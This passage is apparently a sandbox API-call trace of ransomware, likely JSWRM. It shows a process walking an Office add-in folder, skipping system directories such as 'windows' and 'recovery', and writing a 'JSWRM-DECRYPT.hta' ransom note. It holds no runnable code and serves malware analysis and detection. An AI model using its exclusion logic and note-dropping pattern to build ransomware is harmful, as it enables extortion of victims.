dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0126.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.897] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.897] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d800, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d920, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0126.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.898] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d04716, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d04716, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d04716, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa080, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.898] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.899] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1d71cd8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d71cd8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.899] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0126.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.900] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1d71cd8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d71cd8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.900] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.900] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae48f06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae48f06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ReportingServicesNativeClient.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2=".") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="..") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="...") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="windows") returned -1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="recovery") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="perflogs") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="documents and settings") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="system volume information") returned -1 [0126.900] lstrcmpiW (lpString1="ReportingServicesNativeClient.dll", lpString2="msocache") returned 1 [0126.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0126.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0126.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.dll", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.dll", lpUsedDefaultChar=0x0) returned 33 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0126.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0126.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0126.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.dll", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.dll", lpUsedDefaultChar=0x0) returned 33 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0126.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2477a0 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.900] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0126.900] lstrcmpiW (lpString1="Resources", lpString2=".") returned 1 [0126.900] lstrcmpiW (lpString1="Resources", lpString2="..") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="...") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="windows") returned -1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="recovery") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="perflogs") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="documents and settings") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="$RECYCLE.BIN") returned 1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="system volume information") returned -1 [0126.901] lstrcmpiW (lpString1="Resources", lpString2="msocache") returned 1 [0126.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0126.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0126.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0126.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0126.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0126.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0126.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\jswrm-decrypt.hta")) returned 0xffffffff [0126.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0126.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.903] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.903] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.904] CloseHandle (hObject=0x314) returned 1 [0126.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\jswrm-decrypt.hta")) returned 0x20 [0126.904] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x424c283f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0126.904] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.904] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x424c283f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.904] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.904] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.904] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf145ad52, 